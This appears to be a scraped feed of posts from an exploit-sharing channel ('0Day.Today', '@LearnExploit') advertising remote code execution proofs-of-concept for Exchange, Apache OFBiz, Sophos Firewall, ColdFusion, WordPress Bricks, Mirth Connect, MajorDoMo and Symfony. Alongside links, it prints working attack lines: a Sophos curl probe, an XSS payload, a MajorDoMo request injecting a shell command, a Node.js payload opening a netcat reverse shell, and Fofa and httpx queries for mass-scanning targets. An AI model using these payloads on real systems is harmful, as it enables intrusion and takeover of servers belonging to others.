Forwarded from hr
CVE-2023-36745: Microsoft Exchange Server RCE CVE-2023-36745
read
Poc
#cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
read
Poc
#cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
Cybersecurity News
Microsoft Exchange Server RCE (CVE-2023-36745) Flaw Gets PoC Exploit
Proof-of-concept (PoC) exploit code has been published for a Microsoft Exchange Server vulnerability tracked as CVE-2023-36745
CVE-2023-49070 - Pre-auth RCE in Apache Ofbiz 18.12.09
Github
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC
Contribute to abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC development by creating an account on GitHub.
CVE-2022-1040 - RCE in Sophos Firewall
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
curl -sk -H "X-Requested-With: XMLHttpRequest" -X POST 'hxxps://x.x.x.x/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"x":"test"\}' | grep -q 'Session Expired'
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
reflected XSS to RCE
Payload:
#Xss #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
"><img src=x onerror=alert(whoami)>
#Xss #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-26360 - Unauthenticated RCE in Adobe Coldfusion
POC
#CVE #POC #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
#CVE #POC #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management
Unauthenticated RCE in Adobe Coldfusion – CVE-2023-26360
Overview CVE-2023-263060 was exploited in the wild in Adobe ColdFusion product, a commercial application server for rapid web application development. The vulnerability affects both the 2018 and...
PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)
Github
#RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
MajorDoMo thumb RCE
#rce #Poc #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23 %3B HTTP/1.1``
#rce #Poc #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
If you discover a node.js template area, you should try triggerable node payload 🔥; require('child_process').exec('nc -e sh ip port');{src:/bin/sh/}
so you can get RCE 💎
#rce #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
so you can get RCE 💎
#rce #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Exploits Symfony
httpx -l hosts.txt -path /_fragment?_path=_controller=phpcredits&flag=-1 -threads 100 -random-agent -x GET -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "PHP Credits"
Github
#Exploit #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
httpx -l hosts.txt -path /_fragment?_path=_controller=phpcredits&flag=-1 -threads 100 -random-agent -x GET -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "PHP Credits"
Github
#Exploit #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army